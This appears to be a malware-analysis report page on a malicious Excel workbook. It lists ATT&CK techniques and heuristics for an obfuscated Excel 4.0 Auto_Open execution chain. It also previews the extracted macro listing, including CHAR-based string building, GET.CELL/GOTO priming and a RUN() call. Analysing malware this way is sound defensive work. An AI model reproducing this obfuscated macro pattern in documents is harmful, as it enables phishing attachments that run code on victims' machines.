MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical heuristics indicate the presence of obfuscated Excel 4.0 macros with an Auto_Open execution chain. The macro script contains a RUN command, which is likely used to execute a downloaded payload. The obfuscated nature and the Auto_Open entry suggest a malicious document designed to execute arbitrary code upon opening.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAINExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 128222 bytes |
SHA-256: 7f83366941e29dca365fe5c9c10b481f5fae1ef6cce63bd979cbf4d1c662017b |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!GK63541 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,FJ8,"",74.00000000000000000000 ' Sheet,HZ43,"",-0.23958333333333334259 ' Sheet,IL48,"",821.25000000000000000000 ' Sheet,GJ57,"",-101.00000000000000000000 ' Sheet,CV78,"",-6.85714285714285676221 ' Sheet,ID96,"",-1024.20062499999994543032 ' Sheet,BM201,"",-1.11428471428571440605 ' Sheet,FT229,"",-1.52941176470588224845 ' Sheet,CC262,"",3.78350515463917513870 ' Sheet,HB292,"",19.57978723404255205764 ' Sheet,HO313,"",237.00000000000000000000 ' Sheet,IK326,"",1024.20062499999994543032 ' Sheet,DP356,"",82.00000000000000000000 ' Sheet,HU362,"",-105.00000000000000000000 ' Sheet,IS426,"",319.00000000000000000000 ' Sheet,CB455,"",442.00000000000000000000 ' Sheet,JJ496,"",-0.78846153846153843592 ' Sheet,GF507,"",350.00000000000000000000 ' Sheet,CE509,"",-1.00645161290322571190 ' Sheet,FX625,"",-300.00000000000000000000 ' Sheet,CB629,RUN(ET42246),"" ' Sheet,GJ668,"",306.00000000000000000000 ' Sheet,CH673,"",-1.31372549019607842702 ' Sheet,CS675,"",1.06951871657754016276 ' Sheet,CW699,"",421.00000000000000000000 ' Sheet,ER796,"",371.00000000000000000000 ' Sheet,CX802,"",-1073.20062499999994543032 ' Sheet,DH814,"",1003.20062499999994543032 ' Sheet,FM826,"",1014.20062499999994543032 ' Sheet,CK859,"SET.VALUE(EE64595,-464.00000000000000000000-GET.CELL(8,DL38252)*8)","" ' Sheet,CK860,GOTO(GK1726),"" ' Sheet,BZ864,"",-2.43750000000000000000 ' Sheet,DF887,"",4.41935483870967704689 ' Sheet,GB964,"",144.00000000000000000000 ' Sheet,JI1033,"",424.00000000000000000000 ' Sheet,DI1056,"",269.00000000000000000000 ' Sheet,CG1060,"",383.00000000000000000000 ' Sheet,JO1090,"",-7.42857142857142882519 ' Sheet,Q1124,"",-0.23125015258789061168 ' Sheet,IC1225,"",-146.60007812500001023182 ' Sheet,CN1235,"",-0.52173913043478259421 ' Sheet,HP1318,"",-2.93877551020408178672 ' Sheet,JL1348,"",-293.00000000000000000000 ' Sheet,EF1371,"",0.22045454545454545858 ' Sheet,BN1494,"",-5.71428571428571441260 ' Sheet,GI1617,"",-2.19540229885057458503 ' Sheet,FQ1693,"",-2.34000122070312510658 ' Sheet,GK1726,"FORMULA(CHAR(CX15929*HW54731)&CHAR(EV18496/IL29107)&CHAR(I8486+HJ59436)&CHAR(I8486*L63981)&CHAR(I8486*IX28160)&CHAR(CX15929-JH49704)&CHAR(EE64595+X58901)&CHAR(EV18496*IT1899)&CHAR(JO36747-HT15795)&CHAR(CY53081/CU6518)&CHAR(CK45159/JU34309)&CHAR(CX15929*JO6177)&CHAR(CX15929-P39783)&CHAR(JO36747+JS26077)&CHAR(CK45159+BD57850)&CHAR(CX15929-GB64489)&CHAR(JO36747-DV63805)&CHAR(HK35762-IN64579)&CHAR(CM40849-HX5335)&CHAR(EE64595/BZ11420)&CHAR(BA4635+HX55285)&CHAR(CM40849+EL3584)&CHAR(BA4635/DH30441)&CHAR(EE64595/BM61264)&CHAR(CX15929+EX25819)&CHAR(CK45159/BL40033)&CHAR(EV18496-CN47058)&CHAR(CK45159*BG53277)&CHAR(CX15929*FH34983)&CHAR(CK45159+D26657)&CHAR(CK45159*EG64639),IK1908)","" ' Sheet,GK1727,GOTO(HJ26579),"" ' Sheet,HA1776,"",-74.00000000000000000000 ' Sheet,HN1830,"",-296.00000000000000000000 ' Sheet,N1850,"",164.60015624999999772626 ' Sheet,GF1851,"",-159.00000000000000000000 ' Sheet,JT1884,"",-0.18421052631578946346 ' Sheet,IT1899,"",0.27520435967302453451 ' Sheet,IF1911,"",246.00000000000000000000 ' Sheet,FT1917,"",-0.77611940298507464675 ' Sheet,BG1937,"",-571.00000000000000000000 ' Sheet,FB1937,"",235.00000000000000000000 ' Sheet,JT1995,"",-141.60007812500001023182 ' Sheet,BV2086,"",204.60015624999999772626 ' Sheet,FE2089,"",1.22994652406417115387 ' Sheet,GQ2092,"",92.00000000000000000000 ' Sheet,HR2162,"",-1.00000000000000000000 ' Sheet,FB2199,"",89.00000000000000000000 ' Sheet,GK2340,"",11.51752577319587622640 ' Sheet,FG2358,"",284.00000000000000000000 ' Sheet,ER2373,"",4.38392857142857117481 ' Sheet,BC2 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.